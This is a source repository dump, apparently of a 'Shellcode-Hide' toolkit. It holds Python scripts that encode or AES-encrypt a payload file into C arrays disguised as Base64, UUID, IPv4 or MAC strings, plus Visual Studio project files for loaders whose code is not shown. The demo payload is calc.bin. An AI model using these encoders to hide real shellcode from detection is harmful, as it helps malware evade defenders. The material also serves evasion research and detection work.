├── calc.bin
├── 3 - Encrypting
└── 1 - AES
│ ├── calc.bin
│ ├── AES
│ ├── AES.vcxproj.user
│ ├── AES.vcxproj.filters
│ ├── AES.sln
│ ├── AES.cpp
│ └── AES.vcxproj
│ └── AES_cryptor.py
├── 2 - Encoding
├── 5 - MAC shellcode
│ ├── calc.bin
│ ├── MACshellcode
│ │ ├── MACshellcode.vcxproj.user
│ │ ├── MACshellcode.vcxproj.filters
│ │ ├── MACshellcode.sln
│ │ ├── MACshellcode.cpp
│ │ └── MACshellcode.vcxproj
│ └── bin2mac.py
├── 1 - Base64 Loading
│ ├── calc.bin
│ ├── Base64
│ │ ├── Base64.vcxproj.user
│ │ ├── Base64.vcxproj.filters
│ │ ├── Base64.sln
│ │ ├── Base64.cpp
│ │ └── Base64.vcxproj
│ └── base64_Encoder.py
├── 2 - Custom Encoding
│ ├── calc.bin
│ ├── CustomEncoding
│ │ ├── CustomEncoding.vcxproj.user
│ │ ├── CustomEncoding.vcxproj.filters
│ │ ├── CustomEncoding.sln
│ │ ├── CustomEncoding.cpp
│ │ └── CustomEncoding.vcxproj
│ └── customEncoder.py
├── 3 - UUID shellcode
│ ├── calc.bin
│ ├── UUIDs
│ │ ├── UUIDs.vcxproj.user
│ │ ├── UUIDs.vcxproj.filters
│ │ ├── UUIDs.sln
│ │ ├── UUIDs.cpp
│ │ └── UUIDs.vcxproj
│ └── bin2uuids.py
└── 4 - IPv4 shellcode
│ ├── calc.bin
│ ├── IPfuscation
│ ├── IPfuscation.vcxproj.user
│ ├── IPfuscation.vcxproj.filters
│ ├── IPfuscation.sln
│ ├── IPfuscation.cpp
│ └── IPfuscation.vcxproj
│ └── bin2ipv4.py
├── 1 - Simple Loader
└── SimpleLoader
│ ├── SimpleLoader.vcxproj.user
│ ├── SimpleLoader.vcxproj.filters
│ ├── SimpleLoader.sln
│ ├── SimpleLoader.cpp
│ └── SimpleLoader.vcxproj
├── 4 - Fileless Shellcode
├── 1 - Using Sockets
│ ├── FilelessShellcode.vcxproj.user
│ ├── FilelessShellcode.vcxproj.filters
│ ├── FilelessShellcode.sln
│ ├── FilelessShellcode.cpp
│ └── FilelessShellcode.vcxproj
└── 2 - Using WinHttp
│ └── WinhttpShellcode
│ ├── WinhttpShellcode.vcxproj.user
│ ├── WinhttpShellcode.vcxproj.filters
│ ├── WinhttpShellcode.sln
│ ├── WinhttpShellcode.cpp
│ └── WinhttpShellcode.vcxproj
├── format.py
└── LICENSE
/calc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SaadAhla/Shellcode-Hide/HEAD/calc.bin
--------------------------------------------------------------------------------
/3 - Encrypting/1 - AES/calc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SaadAhla/Shellcode-Hide/HEAD/3 - Encrypting/1 - AES/calc.bin
--------------------------------------------------------------------------------
/2 - Encoding/5 - MAC shellcode/calc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SaadAhla/Shellcode-Hide/HEAD/2 - Encoding/5 - MAC shellcode/calc.bin
--------------------------------------------------------------------------------
/2 - Encoding/1 - Base64 Loading/calc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SaadAhla/Shellcode-Hide/HEAD/2 - Encoding/1 - Base64 Loading/calc.bin
--------------------------------------------------------------------------------
/2 - Encoding/2 - Custom Encoding/calc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SaadAhla/Shellcode-Hide/HEAD/2 - Encoding/2 - Custom Encoding/calc.bin
--------------------------------------------------------------------------------
/2 - Encoding/3 - UUID shellcode/calc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SaadAhla/Shellcode-Hide/HEAD/2 - Encoding/3 - UUID shellcode/calc.bin
--------------------------------------------------------------------------------
/2 - Encoding/4 - IPv4 shellcode/calc.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SaadAhla/Shellcode-Hide/HEAD/2 - Encoding/4 - IPv4 shellcode/calc.bin
--------------------------------------------------------------------------------
/3 - Encrypting/1 - AES/AES/AES.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/1 - Simple Loader/SimpleLoader/SimpleLoader.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/2 - Encoding/3 - UUID shellcode/UUIDs/UUIDs.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/2 - Encoding/1 - Base64 Loading/Base64/Base64.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/2 - Encoding/4 - IPv4 shellcode/IPfuscation/IPfuscation.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/2 - Encoding/5 - MAC shellcode/MACshellcode/MACshellcode.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/4 - Fileless Shellcode/1 - Using Sockets/FilelessShellcode.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/2 - Encoding/2 - Custom Encoding/CustomEncoding/CustomEncoding.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/4 - Fileless Shellcode/2 - Using WinHttp/WinhttpShellcode/WinhttpShellcode.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/2 - Encoding/1 - Base64 Loading/base64_Encoder.py:
--------------------------------------------------------------------------------
1 | import sys
2 | import base64
3 |
4 |
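# Command-line entry: read the file named by the first argument and print its
# Base64 text on stdout.
try:
    # `with` closes the handle as soon as the bytes have been read.
    with open(sys.argv[1], "rb") as payload_file:
        content = payload_file.read()
except (IndexError, OSError):
    # IndexError: no argument was given; OSError: the path could not be opened
    # or read. Other exceptions (e.g. KeyboardInterrupt) are no longer hidden.
    # The backslash is escaped because "\b" in a normal string literal is a
    # backspace character, which garbled the usage line.
    print("Usage: .\\base64.py PAYLOAD_FILE")
    # Non-zero status so a calling shell can tell the run failed.
    sys.exit(1)


# b64encode returns ASCII bytes; decode them so print() emits plain text.
b64 = base64.b64encode(content)
print(b64.decode("utf-8"))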
14 |
15 |
--------------------------------------------------------------------------------
/format.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
def printResult(content):
    """Print ``content`` on stdout as a C ``unsigned char shellcode[]`` initializer.

    Each item of ``content`` is written as ``0x`` followed by its lowercase hex
    digits without zero padding, so the byte 0x05 appears as ``0x5``.
    """
    hex_digits = [format(value, 'x') for value in content]
    initializer = '0x' + ', 0x'.join(hex_digits)
    print('unsigned char shellcode[] = { ' + initializer + ' };')
6 |
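# Command-line entry: read the file named by the first argument and print it as
# a C array via printResult().
try:
    # `with` closes the handle; the earlier code left it open until exit.
    with open(sys.argv[1], "rb") as payload_file:
        content = payload_file.read()
except (IndexError, OSError):
    # IndexError: no argument was given; OSError: the path could not be opened
    # or read. The backslash is escaped because "\f" in a normal string literal
    # is a form-feed character, which garbled the usage line.
    print("Usage: .\\format.py PAYLOAD_FILE")
    # Non-zero status so a calling shell can tell the run failed.
    sys.exit(1)

printResult(content)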
15 |
16 |
17 |
--------------------------------------------------------------------------------
/2 - Encoding/5 - MAC shellcode/bin2mac.py:
--------------------------------------------------------------------------------
1 | from macaddress import MAC
2 | import sys
3 |
# The input file path is required as the first argument.
if len(sys.argv) < 2:
    print("Usage: %s " % sys.argv[0])
    sys.exit(1)

# Print the input file as a C array of strings produced by MAC(), six bytes
# per entry.
MAC_BYTES = 6
with open(sys.argv[1], "rb") as f:
    group = f.read(MAC_BYTES)
    print("{}const char* MAC[] =".format(' '*4))
    print(" {")
    # Every full six-byte group is printed with a trailing comma.
    while len(group) == MAC_BYTES:
        print("{}\"{}\",".format(' '*8,MAC(group)))
        group = f.read(MAC_BYTES)
    # A short final group is filled up to six bytes with 0x90 and printed
    # without a comma. The filler is constant, so the tail of that last entry
    # is the same for every input whose length is not a multiple of six.
    if group:
        group = group + (b"\x90" * (MAC_BYTES - len(group)))
        print("{}\"{}\"".format(' '*8,MAC(group)))
    print(" };")
21 |
--------------------------------------------------------------------------------
/2 - Encoding/4 - IPv4 shellcode/bin2ipv4.py:
--------------------------------------------------------------------------------
1 | from ipaddress import ip_address
2 | import sys
3 |
# The input file path is required as the first argument.
if len(sys.argv) < 2:
    print("Usage: %s " % sys.argv[0])
    sys.exit(1)

# Print the input file as a C array of dotted-quad strings, four bytes per
# entry (ip_address() turns a 4-byte value into an IPv4 address).
IPV4_BYTES = 4
with open(sys.argv[1], "rb") as f:
    group = f.read(IPV4_BYTES)
    print("{}const char* IPv4s[] =".format(' '*4))
    print(" {")
    # Every full four-byte group is printed with a trailing comma.
    while len(group) == IPV4_BYTES:
        print("{}\"{}\",".format(' '*8,ip_address(group)))
        group = f.read(IPV4_BYTES)
    # A short final group is filled up to four bytes with 0x90 (144 in
    # dotted-decimal) and printed without a comma, so that entry ends in one
    # or more ".144" octets.
    if group:
        group = group + (b"\x90" * (IPV4_BYTES - len(group)))
        print("{}\"{}\"".format(' '*8,ip_address(group)))
    print(" };")
21 |
--------------------------------------------------------------------------------
/2 - Encoding/2 - Custom Encoding/customEncoder.py:
--------------------------------------------------------------------------------
1 | # python3
2 | import sys
3 |
def Encode(data):
    """Return ``data`` as a string with a position-dependent offset added.

    Items at even indexes are increased by 1 and items at odd indexes by 2;
    each result is turned into a character with ``chr``.

    The sum is not reduced modulo 256, so an input byte of 0xff (or 0xfe at an
    odd index) produces a code point above 0xff.
    """
    return "".join(
        chr(value + (1 if position % 2 == 0 else 2))
        for position, value in enumerate(data)
    )
12 |
13 |
def printCiphertext(ciphertext):
    """Print the characters of ``ciphertext`` on stdout as a C brace initializer.

    Each character is written as ``0x`` followed by the lowercase hex digits of
    its code point, without zero padding.
    """
    hex_digits = [format(ord(symbol), 'x') for symbol in ciphertext]
    print('{ ' + '0x' + ', 0x'.join(hex_digits) + ' };')
16 |
17 |
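# Command-line entry: read the file named by the first argument, run it
# through Encode() and print the result via printCiphertext().
try:
    # `with` closes the handle as soon as the bytes have been read.
    with open(sys.argv[1], "rb") as payload_file:
        content = payload_file.read()
except (IndexError, OSError):
    # IndexError: no argument was given; OSError: the path could not be opened
    # or read. The backslash is escaped because "\E" is an invalid escape
    # sequence, which newer Python versions warn about.
    print("Usage: .\\Encoder.py PAYLOAD_FILE")
    # Non-zero status so a calling shell can tell the run failed.
    sys.exit(1)


cipherText = Encode(content)
printCiphertext(cipherText)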
28 |
29 |
--------------------------------------------------------------------------------
/2 - Encoding/3 - UUID shellcode/bin2uuids.py:
--------------------------------------------------------------------------------
1 | # Author : boku7 from (https://github.com/boku7/Ninja_UUID_Runner/blob/main/bin2uuids.py)
2 | from uuid import UUID
3 | import sys
4 |
# The input file path is required as the first argument.
if len(sys.argv) < 2:
    print("Usage: %s " % sys.argv[0])
    sys.exit(1)

# Print the input file as a C array of UUID strings, sixteen bytes per entry.
# UUID(bytes_le=...) reads the first three UUID fields as little-endian.
UUID_BYTES = 16
with open(sys.argv[1], "rb") as f:
    group = f.read(UUID_BYTES)
    print("{}const char* uuids[] =".format(' '*4))
    print(" {")
    # Every full sixteen-byte group is printed with a trailing comma.
    while len(group) == UUID_BYTES:
        print("{}\"{}\",".format(' '*8,UUID(bytes_le=group)))
        group = f.read(UUID_BYTES)
    # A short final group is filled up to sixteen bytes with 0x90 and printed
    # without a comma, so the tail of that last entry is a run of "90" digits.
    if group:
        group = group + (b"\x90" * (UUID_BYTES - len(group)))
        print("{}\"{}\"".format(' '*8,UUID(bytes_le=group)))
    print(" };")
22 |
--------------------------------------------------------------------------------
/3 - Encrypting/1 - AES/AES_cryptor.py:
--------------------------------------------------------------------------------
1 | import sys
2 | from Crypto.Cipher import AES
3 | from Crypto.Util.Padding import pad
4 | from os import urandom
5 | import hashlib
6 |
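def AESencrypt(plaintext, key):
    """Encrypt ``plaintext`` with AES in CBC mode under a key derived from ``key``.

    The AES key is the SHA-256 digest of ``key`` (32 bytes). ``plaintext`` is
    padded to the AES block size with ``pad`` before encryption.

    Returns the tuple ``(ciphertext, key)``; ``key`` is handed back unchanged.
    """
    # Derive from the parameter rather than the module-level KEY, so the
    # function no longer depends on a global being defined before the call.
    k = hashlib.sha256(key).digest()
    # NOTE(review): the IV is fixed at sixteen zero bytes, so the same key and
    # plaintext always give the same ciphertext.
    iv = 16 * b'\x00'
    plaintext = pad(plaintext, AES.block_size)
    cipher = AES.new(k, AES.MODE_CBC, iv)
    ciphertext = cipher.encrypt(plaintext)
    return ciphertext,key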
14 |
15 |
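def printResult(key, ciphertext):
    """Print ``key`` and ``ciphertext`` on stdout as two C array definitions.

    ``key`` becomes ``char AESkey[]`` and ``ciphertext`` becomes
    ``unsigned char AESshellcode[]``. Each byte is written as ``0x`` followed
    by its lowercase hex digits without zero padding.
    """
    # Format the ``key`` argument; the body previously read the module-level
    # KEY and ignored the parameter.
    print('char AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in key) + ' };')
    print('unsigned char AESshellcode[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')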
19 |
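# Command-line entry: read the file named by the first argument, encrypt it
# under a fresh random key and print key and ciphertext as C arrays.
try:
    # `with` closes the handle; the earlier code left it open until exit.
    with open(sys.argv[1], "rb") as payload_file:
        content = payload_file.read()
except (IndexError, OSError):
    # IndexError: no argument was given; OSError: the path could not be opened
    # or read. The backslash is escaped because "\A" is an invalid escape
    # sequence, which newer Python versions warn about.
    print("Usage: .\\AES_cryptor.py PAYLOAD_FILE")
    # Non-zero status so a calling shell can tell the run failed.
    sys.exit(1)


# A new 16-byte key is drawn from os.urandom on every run.
KEY = urandom(16)
ciphertext, key = AESencrypt(content, KEY)

printResult(KEY,ciphertext)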
32 |
33 |
34 |
--------------------------------------------------------------------------------
/3 - Encrypting/1 - AES/AES/AES.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/2 - Encoding/1 - Base64 Loading/Base64/Base64.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/2 - Encoding/3 - UUID shellcode/UUIDs/UUIDs.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/1 - Simple Loader/SimpleLoader/SimpleLoader.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/2 - Encoding/4 - IPv4 shellcode/IPfuscation/IPfuscation.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/2 - Encoding/5 - MAC shellcode/MACshellcode/MACshellcode.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/2 - Encoding/2 - Custom Encoding/CustomEncoding/CustomEncoding.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/4 - Fileless Shellcode/1 - Using Sockets/FilelessShellcode.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/4 - Fileless Shellcode/2 - Using WinHttp/WinhttpShellcode/WinhttpShellcode.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2023 SAAD AHLA
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/3 - Encrypting/1 - AES/AES/AES.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32106.194
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "AES", "AES.vcxproj", "{B2EE63EA-095F-40CC-92D8-BAC976655636}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {B2EE63EA-095F-40CC-92D8-BAC976655636}.Debug|x64.ActiveCfg = Debug|x64
17 | {B2EE63EA-095F-40CC-92D8-BAC976655636}.Debug|x64.Build.0 = Debug|x64
18 | {B2EE63EA-095F-40CC-92D8-BAC976655636}.Debug|x86.ActiveCfg = Debug|Win32
19 | {B2EE63EA-095F-40CC-92D8-BAC976655636}.Debug|x86.Build.0 = Debug|Win32
20 | {B2EE63EA-095F-40CC-92D8-BAC976655636}.Release|x64.ActiveCfg = Release|x64
21 | {B2EE63EA-095F-40CC-92D8-BAC976655636}.Release|x64.Build.0 = Release|x64
22 | {B2EE63EA-095F-40CC-92D8-BAC976655636}.Release|x86.ActiveCfg = Release|Win32
23 | {B2EE63EA-095F-40CC-92D8-BAC976655636}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {E673D20E-7313-4141-8040-48CDDB2BA099}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/2 - Encoding/3 - UUID shellcode/UUIDs/UUIDs.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32106.194
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "UUIDs", "UUIDs.vcxproj", "{70527328-DCEC-4BA7-9958-B5BC3E48CE99}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {70527328-DCEC-4BA7-9958-B5BC3E48CE99}.Debug|x64.ActiveCfg = Debug|x64
17 | {70527328-DCEC-4BA7-9958-B5BC3E48CE99}.Debug|x64.Build.0 = Debug|x64
18 | {70527328-DCEC-4BA7-9958-B5BC3E48CE99}.Debug|x86.ActiveCfg = Debug|Win32
19 | {70527328-DCEC-4BA7-9958-B5BC3E48CE99}.Debug|x86.Build.0 = Debug|Win32
20 | {70527328-DCEC-4BA7-9958-B5BC3E48CE99}.Release|x64.ActiveCfg = Release|x64
21 | {70527328-DCEC-4BA7-9958-B5BC3E48CE99}.Release|x64.Build.0 = Release|x64
22 | {70527328-DCEC-4BA7-9958-B5BC3E48CE99}.Release|x86.ActiveCfg = Release|Win32
23 | {70527328-DCEC-4BA7-9958-B5BC3E48CE99}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {806A7F57-2693-4B23-9C28-84878B8D4277}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/2 - Encoding/1 - Base64 Loading/Base64/Base64.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32106.194
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Base64", "Base64.vcxproj", "{B651A53C-FAE6-482E-A590-CA3B48B7F384}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {B651A53C-FAE6-482E-A590-CA3B48B7F384}.Debug|x64.ActiveCfg = Debug|x64
17 | {B651A53C-FAE6-482E-A590-CA3B48B7F384}.Debug|x64.Build.0 = Debug|x64
18 | {B651A53C-FAE6-482E-A590-CA3B48B7F384}.Debug|x86.ActiveCfg = Debug|Win32
19 | {B651A53C-FAE6-482E-A590-CA3B48B7F384}.Debug|x86.Build.0 = Debug|Win32
20 | {B651A53C-FAE6-482E-A590-CA3B48B7F384}.Release|x64.ActiveCfg = Release|x64
21 | {B651A53C-FAE6-482E-A590-CA3B48B7F384}.Release|x64.Build.0 = Release|x64
22 | {B651A53C-FAE6-482E-A590-CA3B48B7F384}.Release|x86.ActiveCfg = Release|Win32
23 | {B651A53C-FAE6-482E-A590-CA3B48B7F384}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {6CD1D8F0-AC05-4C8F-AB99-5C58D52C5DA2}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/1 - Simple Loader/SimpleLoader/SimpleLoader.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.32106.194
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SimpleLoader", "SimpleLoader.vcxproj", "{497CA37F-506C-46CD-9B8D-F9BB0DA34B95}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {497CA37F-506C-46CD-9B8D-F9BB0DA34B95}.Debug|x64.ActiveCfg = Debug|x64
17 | {497CA37F-506C-46CD-9B8D-F9BB0DA34B95}.Debug|x64.Build.0 = Debug|x64
18 | {497CA37F-506C-46CD-9B8D-F9BB0DA34B95}.Debug|x86.ActiveCfg = Debug|Win32
19 | {497CA37F-506C-46CD-9B8D-F9BB0DA34B95}.Debug|x86.Build.0 = Debug|Win32
20 | {497CA37F-506C-46CD-9B8D-F9BB0DA34B95}.Release|x64.ActiveCfg = Release|x64
21 | {497CA37F-506C-46CD-9B8D-F9BB0DA34B95}.Release|x64.Build.0 = Release|x64
